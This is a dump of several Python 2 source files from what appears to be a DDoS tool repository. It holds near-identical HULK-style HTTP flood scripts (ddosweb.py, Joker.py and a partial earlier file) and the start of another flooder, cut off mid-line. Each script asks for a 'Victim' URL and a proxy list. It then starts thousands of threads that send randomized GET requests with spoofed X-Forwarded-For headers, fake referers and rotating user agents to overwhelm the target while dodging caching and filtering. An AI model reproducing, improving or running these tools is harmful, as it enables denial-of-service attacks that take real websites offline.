datetime.date.today().year 54 | year = str(random.randint(2000, currentYear)) 55 | month = random.randint(1, 12) 56 | if month < 10: 57 | month = '0' + str(month) 58 | else: 59 | month = str(month) 60 | day = random.randint(1, 300) 61 | if day < 10: 62 | day = '0' + str(day) 63 | else: 64 | day = str(day) 65 | gecko = year + month + day 66 | version = str(random.randint(1, 21)) + '.0' 67 | return 'Mozilla/5.0 (' + os + '; rv:' + version + ') Gecko/' + gecko + ' Firefox/' + version 68 | elif browser == 'ie': 69 | version = str(random.randint(1, 10)) + '.0' 70 | engine = str(random.randint(1, 5)) + '.0' 71 | option = random.choice([True, False]) 72 | if option == True: 73 | token = random.choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']) + '; ' 74 | else: 75 | token = '' 76 | return 'Mozilla/5.0 (compatible; MSIE ' + version + '; ' + os + '; ' + token + 'Trident/' + engine + ')' 77 | 78 | def referer_list(): 79 | global headers_referers 80 | headers_referers.append('https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u=') 81 | headers_referers.append('http://www.google.com/?q=') 82 | headers_referers.append('https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=') 83 | headers_referers.append('https://drive.google.com/viewerng/viewer?url=') 84 | headers_referers.append('http://www.google.com/translate?u=') 85 | headers_referers.append('https://developers.google.com/speed/pagespeed/insights/?url=') 86 | headers_referers.append('http://help.baidu.com/searchResult?keywords=') 87 | headers_referers.append('http://www.bing.com/search?q=') 88 | headers_referers.append('https://add.my.yahoo.com/rss?url=') 89 | headers_referers.append('https://play.google.com/store/search?q=') 90 | return(headers_referers) 91 | 92 | def keyword_list(): 93 | global keyword_top 94 | keyword_top.append('Sex') 95 | keyword_top.append('Robin Williams') 96 | keyword_top.append('World Cup') 97 | keyword_top.append('Ca Si Le Roi') 98 | keyword_top.append('Ebola') 99 | keyword_top.append('Malaysia Airlines Flight 370') 100 | keyword_top.append('ALS Ice Bucket Challenge') 101 | keyword_top.append('Flappy Bird') 102 | keyword_top.append('Conchita Wurst') 103 | keyword_top.append('ISIS') 104 | keyword_top.append('Frozen') 105 | keyword_top.append('014 Sochi Winter Olympics') 106 | keyword_top.append('IPhone') 107 | keyword_top.append('Samsung Galaxy S5') 108 | keyword_top.append('Nexus 6') 109 | keyword_top.append('Moto G') 110 | keyword_top.append('Samsung Note 4') 111 | keyword_top.append('LG G3') 112 | keyword_top.append('Xbox One') 113 | keyword_top.append('Apple Watch') 114 | keyword_top.append('Nokia X') 115 | keyword_top.append('Ipad Air') 116 | keyword_top.append('Facebook') 117 | keyword_top.append('Anonymous') 118 | return(keyword_top) 119 | 120 | def buildblock(size): 121 | out_str = '' 122 | for i in range(0, size): 123 | a = random.randint(65, 90) 124 | out_str += chr(a) 125 | return(out_str) 126 | 127 | def httpcall(url): 128 | referer_list() 129 | code=0 130 | if url.count("?")>0: 131 | param_joiner = "&" 132 | else: 133 | param_joiner = "?" 134 | request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) 135 | request.add_header('User-Agent', getUserAgent()) 136 | request.add_header('Cache-Control', 'no-cache') 137 | request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') 138 | request.add_header('Referer', random.choice(headers_referers) + host + buildblock(random.randint(5,10))) 139 | request.add_header('Keep-Alive', random.randint(110,120)) 140 | request.add_header('Connection', 'keep-alive') 141 | request.add_header('Host',host) 142 | 143 | index = random.randint(0,len(listaproxy)-1) 144 | proxy = urllib2.ProxyHandler({'http':listaproxy[index]}) 145 | opener = urllib2.build_opener(proxy,urllib2.HTTPHandler) 146 | urllib2.install_opener(opener) 147 | try: 148 | urllib2.urlopen(request) 149 | if(flag==1): set_flag(0) 150 | if(code==500): code=0 151 | except urllib2.HTTPError, e: 152 | set_flag(1) 153 | code=500 154 | time.sleep(60) 155 | except urllib2.URLError, e: 156 | sys.exit() 157 | else: 158 | inc_counter() 159 | urllib2.urlopen(request) 160 | return(code) 161 | 162 | class HTTPThread(threading.Thread): 163 | def run(self): 164 | try: 165 | while flag<2: 166 | code=httpcall(url) 167 | if (code==500) & (safe==1): 168 | set_flag(2) 169 | except Exception, ex: 170 | pass 171 | 172 | class MonitorThread(threading.Thread): 173 | def run(self): 174 | previous=request_counter 175 | while flag==0: 176 | if (previous+100request_counter): 177 | previous=request_counter 178 | if flag==2: 179 | print '' 180 | 181 | #DIE_v8 Mod By CLOVERDOSER 182 | def randomIp(): 183 | random.seed() 184 | result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) 185 | result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) 186 | return result 187 | 188 | def randomIpList(): 189 | random.seed() 190 | res = "" 191 | for ip in xrange(random.randint(8, 10)): 192 | res = res + randomIp() + ", " 193 | return res[0:len(res) - 2] 194 | class attacco(threading.Thread): 195 | def run(self): 196 | referer_list() 197 | current = x 198 | 199 | if current < len(listaproxy): 200 | proxy = listaproxy[current].split(':') 201 | else: 202 | proxy = random.choice(listaproxy).split(':') 203 | 204 | useragent = "User-Agent: " + getUserAgent() + "\r\n" 205 | forward = "X-Forwarded-For: " + randomIpList() + "\r\n" 206 | referer = "Referer: "+ random.choice(headers_referers) + url + "?r="+ str(random.randint(1, 1500)) + "\r\n" 207 | httprequest = get_host + useragent + referer + accept + forward + connection + "\r\n" 208 | 209 | while nload: 210 | time.sleep(1) 211 | pass 212 | 213 | while 1: 214 | try: 215 | a = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 216 | a.connect((proxy[0], int(proxy[1]))) 217 | a.send(httprequest) 218 | try: 219 | for i in xrange(4): 220 | a.send(httprequest) 221 | except: 222 | tts = 1 223 | 224 | 225 | except: 226 | proxy = random.choice(listaproxy).split(':') 227 | 228 | #Main 229 | print '\n\t..:: > Code Mod CLOVERDOSER < ::..' 230 | print '\t ==>.:::CLOVERDOSER:::.<== ' 231 | # Site 232 | url = raw_input("Victim: ") 233 | host_url = url.replace("http://", "").replace("https://", "").split('/')[0] 234 | #Proxy 235 | in_file = open(raw_input("File proxy: "),"r") 236 | proxyf = in_file.read() 237 | 238 | 239 | in_file.close() 240 | listaproxy = proxyf.split('\n') 241 | #So luong 242 | thread = input("So luong (5000): ") 243 | get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n" 244 | accept = "Accept-Encoding: gzip, deflate\r\n" 245 | connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n" 246 | nload = 1 247 | x = 0 248 | print("\CLOVERDOSER") 249 | if url.count("/")==2: 250 | url = url + "/" 251 | m = re.search('http\://([^/]*)/?.*', url) 252 | host = m.group(1) 253 | for x in xrange(int(thread + 1)): 254 | attacco().start() 255 | time.sleep(0.003) 256 | 257 | print "Attacking <====> -_- <===>" 258 | for x in xrange(501): 259 | t = HTTPThread() 260 | t.start() 261 | t = MonitorThread() 262 | t.start() 263 | nload = 0 264 | while not nload: 265 | time.sleep(1) -------------------------------------------------------------------------------- /ddosweb.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding: utf-8 3 | #..:: > DDoS < ::.. Mod By DDoS-Webstie 4 | 5 | import random 6 | import socket 7 | import threading 8 | import time 9 | import datetime 10 | import urllib2 11 | import urllib 12 | import re 13 | import sys 14 | import optparse 15 | import os 16 | import urlparse 17 | 18 | #Hulk Mod By Hùng 19 | url='' 20 | host='' 21 | headers_useragents=[] 22 | headers_referers=[] 23 | keyword_top=[] 24 | request_counter=0 25 | flag=0 26 | safe=0 27 | def inc_counter(): 28 | global request_counter 29 | request_counter+=1 30 | 31 | def set_flag(val): 32 | global flag 33 | flag=val 34 | 35 | def set_safe(): 36 | global safe 37 | safe=1 38 | 39 | def getUserAgent(): 40 | platform = random.choice(['Macintosh', 'Windows', 'X11']) 41 | if platform == 'Macintosh': 42 | os = random.choice(['68K', 'PPC']) 43 | elif platform == 'Windows': 44 | os = random.choice(['Win3.11', 'WinNT3.51', 'WinNT4.0', 'Windows NT 5.0', 'Windows NT 5.1', 'Windows NT 5.2', 'Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2', 'Win95', 'Win98', 'Win 9x 4.90', 'WindowsCE', 'Windows 7', 'Windows 8']) 45 | elif platform == 'X11': 46 | os = random.choice(['Linux i686', 'Linux x86_64']) 47 | browser = random.choice(['chrome', 'firefox', 'ie']) 48 | if browser == 'chrome': 49 | webkit = str(random.randint(500, 599)) 50 | version = str(random.randint(0, 28)) + '.0' + str(random.randint(0, 1500)) + '.' + str(random.randint(0, 999)) 51 | return 'Mozilla/5.0 (' + os + ') AppleWebKit/' + webkit + '.0 (KHTML, like Gecko) Chrome/' + version + ' Safari/' + webkit 52 | elif browser == 'firefox': 53 | currentYear = datetime.date.today().year 54 | year = str(random.randint(2000, currentYear)) 55 | month = random.randint(1, 12) 56 | if month < 10: 57 | month = '0' + str(month) 58 | else: 59 | month = str(month) 60 | day = random.randint(1, 30) 61 | if day < 10: 62 | day = '0' + str(day) 63 | else: 64 | day = str(day) 65 | gecko = year + month + day 66 | version = str(random.randint(1, 21)) + '.0' 67 | return 'Mozilla/5.0 (' + os + '; rv:' + version + ') Gecko/' + gecko + ' Firefox/' + version 68 | elif browser == 'ie': 69 | version = str(random.randint(1, 10)) + '.0' 70 | engine = str(random.randint(1, 5)) + '.0' 71 | option = random.choice([True, False]) 72 | if option == True: 73 | token = random.choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']) + '; ' 74 | else: 75 | token = '' 76 | return 'Mozilla/5.0 (compatible; MSIE ' + version + '; ' + os + '; ' + token + 'Trident/' + engine + ')' 77 | 78 | def referer_list(): 79 | global headers_referers 80 | headers_referers.append('https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u=') 81 | headers_referers.append('http://www.google.com/?q=') 82 | headers_referers.append('https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=') 83 | headers_referers.append('https://drive.google.com/viewerng/viewer?url=') 84 | headers_referers.append('http://www.google.com/translate?u=') 85 | headers_referers.append('https://developers.google.com/speed/pagespeed/insights/?url=') 86 | headers_referers.append('http://help.baidu.com/searchResult?keywords=') 87 | headers_referers.append('http://www.bing.com/search?q=') 88 | headers_referers.append('https://add.my.yahoo.com/rss?url=') 89 | headers_referers.append('https://play.google.com/store/search?q=') 90 | return(headers_referers) 91 | 92 | def keyword_list(): 93 | global keyword_top 94 | keyword_top.append('Sex') 95 | keyword_top.append('Robin Williams') 96 | keyword_top.append('World Cup') 97 | keyword_top.append('Ca Si Le Roi') 98 | keyword_top.append('Ebola') 99 | keyword_top.append('Malaysia Airlines Flight 370') 100 | keyword_top.append('ALS Ice Bucket Challenge') 101 | keyword_top.append('Flappy Bird') 102 | keyword_top.append('Conchita Wurst') 103 | keyword_top.append('ISIS') 104 | keyword_top.append('Frozen') 105 | keyword_top.append('014 Sochi Winter Olympics') 106 | keyword_top.append('IPhone') 107 | keyword_top.append('Samsung Galaxy S5') 108 | keyword_top.append('Nexus 6') 109 | keyword_top.append('Moto G') 110 | keyword_top.append('Samsung Note 4') 111 | keyword_top.append('LG G3') 112 | keyword_top.append('Xbox One') 113 | keyword_top.append('Apple Watch') 114 | keyword_top.append('Nokia X') 115 | keyword_top.append('Ipad Air') 116 | keyword_top.append('Facebook') 117 | keyword_top.append('Anonymous') 118 | return(keyword_top) 119 | 120 | def buildblock(size): 121 | out_str = '' 122 | for i in range(0, size): 123 | a = random.randint(65, 90) 124 | out_str += chr(a) 125 | return(out_str) 126 | 127 | def httpcall(url): 128 | referer_list() 129 | Mod=0 130 | if url.count("?")>0: 131 | param_joiner = "&" 132 | else: 133 | param_joiner = "?" 134 | request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) 135 | request.add_header('User-Agent', getUserAgent()) 136 | request.add_header('Cache-Control', 'no-cache') 137 | request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') 138 | request.add_header('Referer', random.choice(headers_referers) + host + buildblock(random.randint(5,10))) 139 | request.add_header('Keep-Alive', random.randint(110,120)) 140 | request.add_header('Connection', 'keep-alive') 141 | request.add_header('Host',host) 142 | 143 | index = random.randint(0,len(listaproxy)-1) 144 | proxy = urllib2.ProxyHandler({'http':listaproxy[index]}) 145 | opener = urllib2.build_opener(proxy,urllib2.HTTPHandler) 146 | urllib2.install_opener(opener) 147 | try: 148 | urllib2.urlopen(request) 149 | if(flag==1): set_flag(0) 150 | if(Mod==500): Mod=0 151 | except urllib2.HTTPError, e: 152 | set_flag(1) 153 | Mod=500 154 | time.sleep(60) 155 | except urllib2.URLError, e: 156 | sys.exit() 157 | else: 158 | inc_counter() 159 | urllib2.urlopen(request) 160 | return(Mod) 161 | 162 | class HTTPThread(threading.Thread): 163 | def run(self): 164 | try: 165 | while flag<2: 166 | Mod=httpcall(url) 167 | if (Mod==500) & (safe==1): 168 | set_flag(2) 169 | except Exception, ex: 170 | pass 171 | 172 | class MonitorThread(threading.Thread): 173 | def run(self): 174 | previous=request_counter 175 | while flag==0: 176 | if (previous+100request_counter): 177 | previous=request_counter 178 | if flag==2: 179 | print '' 180 | 181 | #Joker Mod By Hùng 182 | def randomIp(): 183 | random.seed() 184 | result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) 185 | result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) 186 | return result 187 | 188 | def randomIpList(): 189 | random.seed() 190 | res = "" 191 | for ip in xrange(random.randint(9, 10)): 192 | res = res + randomIp() + ", " 193 | return res[0:len(res) - 2] 194 | class attacco(threading.Thread): 195 | def run(self): 196 | referer_list() 197 | current = x 198 | 199 | if current < len(listaproxy): 200 | proxy = listaproxy[current].split(':') 201 | else: 202 | proxy = random.choice(listaproxy).split(':') 203 | 204 | useragent = "User-Agent: " + getUserAgent() + "\r\n" 205 | forward = "X-Forwarded-For: " + randomIpList() + "\r\n" 206 | referer = "Referer: "+ random.choice(headers_referers) + url + "?r="+ str(random.randint(1, 1000)) + "\r\n" 207 | httprequest = get_host + useragent + referer + accept + forward + connection + "\r\n" 208 | 209 | while nload: 210 | time.sleep(1) 211 | pass 212 | 213 | while 1: 214 | try: 215 | a = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 216 | a.connect((proxy[0], int(proxy[1]))) 217 | a.send(httprequest) 218 | try: 219 | for i in xrange(4): 220 | a.send(httprequest) 221 | except: 222 | tts = 1 223 | 224 | 225 | except: 226 | proxy = random.choice(listaproxy).split(':') 227 | 228 | class attacco1(threading.Thread): 229 | def run(self): 230 | current = x 231 | 232 | if current < len(listaproxy): 233 | proxy = listaproxy[current].split(':') 234 | else: 235 | proxy = random.choice(listaproxy).split(':') 236 | 237 | useragent = "User-Agent: " + getUserAgent() + "\r\n" 238 | forward = "X-Forwarded-For: " + randomIpList() + "\r\n" 239 | httprequest = get_host + useragent + accept + forward + connection + "\r\n" 240 | 241 | while nload: 242 | time.sleep(1) 243 | pass 244 | 245 | while 1: 246 | try: 247 | a = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 248 | a.connect((proxy[0], int(proxy[1]))) 249 | a.send(httprequest) 250 | try: 251 | for i in xrange(4): 252 | a.send(httprequest) 253 | except: 254 | tts = 1 255 | 256 | 257 | except: 258 | proxy = random.choice(listaproxy).split(':') 259 | 260 | #Main 261 | print '\n\t..:: > Mod By DDoS < ::..' 262 | print '\t ==> #~~ DDOS-Webstie ~~# <== ' 263 | # Site 264 | url = raw_input("Victim: ") 265 | host_url = url.replace("http://", "").replace("https://", "").split('/')[0] 266 | #Proxy 267 | in_file = open(raw_input("File proxy: "),"r") 268 | proxyf = in_file.read() 269 | 270 | 271 | in_file.close() 272 | listaproxy = proxyf.split('\n') 273 | #So luong 274 | thread = input("So luong (2000): ") 275 | get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n" 276 | accept = "Accept-Encoding: gzip, deflate\r\n" 277 | connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n" 278 | nload = 1 279 | x = 0 280 | print("\tJoker DDOS Mod By DDoS-Webstie") 281 | if url.count("/")==2: 282 | url = url + "/" 283 | m = re.search('http\://([^/]*)/?.*', url) 284 | host = m.group(1) 285 | for x in xrange(int(thread + 1)): 286 | attacco().start() 287 | attacco1().start() 288 | time.sleep(0.003) 289 | print "Attacking ==========================>>" 290 | for x in xrange(501): 291 | t = HTTPThread() 292 | t.start() 293 | t = MonitorThread() 294 | t.start() 295 | nload = 0 296 | while not nload: 297 | time.sleep(1) -------------------------------------------------------------------------------- /Joker.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding: utf-8 3 | #..:: > Joker < ::.. Mod By JokerLjnk 4 | 5 | import random 6 | import socket 7 | import threading 8 | import time 9 | import datetime 10 | import urllib2 11 | import urllib 12 | import re 13 | import sys 14 | import optparse 15 | import os 16 | import urlparse 17 | 18 | #Hulk Mod By JokerLjnk 19 | url='' 20 | host='' 21 | headers_useragents=[] 22 | headers_referers=[] 23 | keyword_top=[] 24 | request_counter=0 25 | flag=0 26 | safe=0 27 | def inc_counter(): 28 | global request_counter 29 | request_counter+=1 30 | 31 | def set_flag(val): 32 | global flag 33 | flag=val 34 | 35 | def set_safe(): 36 | global safe 37 | safe=1 38 | 39 | def getUserAgent(): 40 | platform = random.choice(['Macintosh', 'Windows', 'X11']) 41 | if platform == 'Macintosh': 42 | os = random.choice(['68K', 'PPC']) 43 | elif platform == 'Windows': 44 | os = random.choice(['Win3.11', 'WinNT3.51', 'WinNT4.0', 'Windows NT 5.0', 'Windows NT 5.1', 'Windows NT 5.2', 'Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2', 'Win95', 'Win98', 'Win 9x 4.90', 'WindowsCE', 'Windows 7', 'Windows 8']) 45 | elif platform == 'X11': 46 | os = random.choice(['Linux i686', 'Linux x86_64']) 47 | browser = random.choice(['chrome', 'firefox', 'ie']) 48 | if browser == 'chrome': 49 | webkit = str(random.randint(500, 599)) 50 | version = str(random.randint(0, 28)) + '.0' + str(random.randint(0, 1500)) + '.' + str(random.randint(0, 999)) 51 | return 'Mozilla/5.0 (' + os + ') AppleWebKit/' + webkit + '.0 (KHTML, like Gecko) Chrome/' + version + ' Safari/' + webkit 52 | elif browser == 'firefox': 53 | currentYear = datetime.date.today().year 54 | year = str(random.randint(2000, currentYear)) 55 | month = random.randint(1, 12) 56 | if month < 10: 57 | month = '0' + str(month) 58 | else: 59 | month = str(month) 60 | day = random.randint(1, 30) 61 | if day < 10: 62 | day = '0' + str(day) 63 | else: 64 | day = str(day) 65 | gecko = year + month + day 66 | version = str(random.randint(1, 21)) + '.0' 67 | return 'Mozilla/5.0 (' + os + '; rv:' + version + ') Gecko/' + gecko + ' Firefox/' + version 68 | elif browser == 'ie': 69 | version = str(random.randint(1, 10)) + '.0' 70 | engine = str(random.randint(1, 5)) + '.0' 71 | option = random.choice([True, False]) 72 | if option == True: 73 | token = random.choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']) + '; ' 74 | else: 75 | token = '' 76 | return 'Mozilla/5.0 (compatible; MSIE ' + version + '; ' + os + '; ' + token + 'Trident/' + engine + ')' 77 | 78 | def referer_list(): 79 | global headers_referers 80 | headers_referers.append('https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u=') 81 | headers_referers.append('http://www.google.com/?q=') 82 | headers_referers.append('https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=') 83 | headers_referers.append('https://drive.google.com/viewerng/viewer?url=') 84 | headers_referers.append('http://www.google.com/translate?u=') 85 | headers_referers.append('https://developers.google.com/speed/pagespeed/insights/?url=') 86 | headers_referers.append('http://help.baidu.com/searchResult?keywords=') 87 | headers_referers.append('http://www.bing.com/search?q=') 88 | headers_referers.append('https://add.my.yahoo.com/rss?url=') 89 | headers_referers.append('https://play.google.com/store/search?q=') 90 | return(headers_referers) 91 | 92 | def keyword_list(): 93 | global keyword_top 94 | keyword_top.append('Sex') 95 | keyword_top.append('Robin Williams') 96 | keyword_top.append('World Cup') 97 | keyword_top.append('Ca Si Le Roi') 98 | keyword_top.append('Ebola') 99 | keyword_top.append('Malaysia Airlines Flight 370') 100 | keyword_top.append('ALS Ice Bucket Challenge') 101 | keyword_top.append('Flappy Bird') 102 | keyword_top.append('Conchita Wurst') 103 | keyword_top.append('ISIS') 104 | keyword_top.append('Frozen') 105 | keyword_top.append('014 Sochi Winter Olympics') 106 | keyword_top.append('IPhone') 107 | keyword_top.append('Samsung Galaxy S5') 108 | keyword_top.append('Nexus 6') 109 | keyword_top.append('Moto G') 110 | keyword_top.append('Samsung Note 4') 111 | keyword_top.append('LG G3') 112 | keyword_top.append('Xbox One') 113 | keyword_top.append('Apple Watch') 114 | keyword_top.append('Nokia X') 115 | keyword_top.append('Ipad Air') 116 | keyword_top.append('Facebook') 117 | keyword_top.append('Anonymous') 118 | return(keyword_top) 119 | 120 | def buildblock(size): 121 | out_str = '' 122 | for i in range(0, size): 123 | a = random.randint(65, 90) 124 | out_str += chr(a) 125 | return(out_str) 126 | 127 | def httpcall(url): 128 | referer_list() 129 | Mod=0 130 | if url.count("?")>0: 131 | param_joiner = "&" 132 | else: 133 | param_joiner = "?" 134 | request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) 135 | request.add_header('User-Agent', getUserAgent()) 136 | request.add_header('Cache-Control', 'no-cache') 137 | request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') 138 | request.add_header('Referer', random.choice(headers_referers) + host + buildblock(random.randint(5,10))) 139 | request.add_header('Keep-Alive', random.randint(110,120)) 140 | request.add_header('Connection', 'keep-alive') 141 | request.add_header('Host',host) 142 | 143 | index = random.randint(0,len(listaproxy)-1) 144 | proxy = urllib2.ProxyHandler({'http':listaproxy[index]}) 145 | opener = urllib2.build_opener(proxy,urllib2.HTTPHandler) 146 | urllib2.install_opener(opener) 147 | try: 148 | urllib2.urlopen(request) 149 | if(flag==1): set_flag(0) 150 | if(Mod==500): Mod=0 151 | except urllib2.HTTPError, e: 152 | set_flag(1) 153 | Mod=500 154 | time.sleep(60) 155 | except urllib2.URLError, e: 156 | sys.exit() 157 | else: 158 | inc_counter() 159 | urllib2.urlopen(request) 160 | return(Mod) 161 | 162 | class HTTPThread(threading.Thread): 163 | def run(self): 164 | try: 165 | while flag<2: 166 | Mod=httpcall(url) 167 | if (Mod==500) & (safe==1): 168 | set_flag(2) 169 | except Exception, ex: 170 | pass 171 | 172 | class MonitorThread(threading.Thread): 173 | def run(self): 174 | previous=request_counter 175 | while flag==0: 176 | if (previous+100request_counter): 177 | previous=request_counter 178 | if flag==2: 179 | print '' 180 | 181 | #Joker Mod By JokerLjnk 182 | def randomIp(): 183 | random.seed() 184 | result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) 185 | result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) 186 | return result 187 | 188 | def randomIpList(): 189 | random.seed() 190 | res = "" 191 | for ip in xrange(random.randint(9, 10)): 192 | res = res + randomIp() + ", " 193 | return res[0:len(res) - 2] 194 | class attacco(threading.Thread): 195 | def run(self): 196 | referer_list() 197 | current = x 198 | 199 | if current < len(listaproxy): 200 | proxy = listaproxy[current].split(':') 201 | else: 202 | proxy = random.choice(listaproxy).split(':') 203 | 204 | useragent = "User-Agent: " + getUserAgent() + "\r\n" 205 | forward = "X-Forwarded-For: " + randomIpList() + "\r\n" 206 | referer = "Referer: "+ random.choice(headers_referers) + url + "?r="+ str(random.randint(1, 1000)) + "\r\n" 207 | httprequest = get_host + useragent + referer + accept + forward + connection + "\r\n" 208 | 209 | while nload: 210 | time.sleep(1) 211 | pass 212 | 213 | while 1: 214 | try: 215 | a = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 216 | a.connect((proxy[0], int(proxy[1]))) 217 | a.send(httprequest) 218 | try: 219 | for i in xrange(4): 220 | a.send(httprequest) 221 | except: 222 | tts = 1 223 | 224 | 225 | except: 226 | proxy = random.choice(listaproxy).split(':') 227 | 228 | class attacco1(threading.Thread): 229 | def run(self): 230 | current = x 231 | 232 | if current < len(listaproxy): 233 | proxy = listaproxy[current].split(':') 234 | else: 235 | proxy = random.choice(listaproxy).split(':') 236 | 237 | useragent = "User-Agent: " + getUserAgent() + "\r\n" 238 | forward = "X-Forwarded-For: " + randomIpList() + "\r\n" 239 | httprequest = get_host + useragent + accept + forward + connection + "\r\n" 240 | 241 | while nload: 242 | time.sleep(1) 243 | pass 244 | 245 | while 1: 246 | try: 247 | a = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 248 | a.connect((proxy[0], int(proxy[1]))) 249 | a.send(httprequest) 250 | try: 251 | for i in xrange(4): 252 | a.send(httprequest) 253 | except: 254 | tts = 1 255 | 256 | 257 | except: 258 | proxy = random.choice(listaproxy).split(':') 259 | 260 | #Main 261 | print '\n\t..:: > Mod By JokerLjnk < ::..' 262 | print '\t ==> #~~ Super DDOS ~~# <== ' 263 | # Site 264 | url = raw_input("Victim: ") 265 | host_url = url.replace("http://", "").replace("https://", "").split('/')[0] 266 | #Proxy 267 | in_file = open(raw_input("File proxy: "),"r") 268 | proxyf = in_file.read() 269 | 270 | 271 | in_file.close() 272 | listaproxy = proxyf.split('\n') 273 | #So luong 274 | thread = input("So luong (2000): ") 275 | get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n" 276 | accept = "Accept-Encoding: gzip, deflate\r\n" 277 | connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n" 278 | nload = 1 279 | x = 0 280 | print("\tJoker DDOS Mod By JokerLjnk") 281 | if url.count("/")==2: 282 | url = url + "/" 283 | m = re.search('http\://([^/]*)/?.*', url) 284 | host = m.group(1) 285 | for x in xrange(int(thread + 1)): 286 | attacco().start() 287 | attacco1().start() 288 | time.sleep(0.003) 289 | print "Attacking ==========================>>" 290 | for x in xrange(501): 291 | t = HTTPThread() 292 | t.start() 293 | t = MonitorThread() 294 | t.start() 295 | nload = 0 296 | while not nload: 297 | time.sleep(1) -------------------------------------------------------------------------------- /jcalex.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding: utf8 3 | 4 | import random 5 | import socket 6 | import threading 7 | import time 8 | userAgents = [ 9 | "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", 10 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", 11 | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5", 12 | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5", 13 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3", 14 | "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0", 15 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0", 16 | "Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0", 17 | "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0", 18 | "Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3", 19 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0", 20 | "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0", 21 | "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))", 22 | "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", 23 | "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)", 24 | "Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)", 25 | "Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00", 26 | "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14", 27 | "Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14", 28 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14", 29 | "Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02", 30 | "Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00", 31 | "Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00", 32 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)", 33 | "HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)", 34 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)", 35 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) 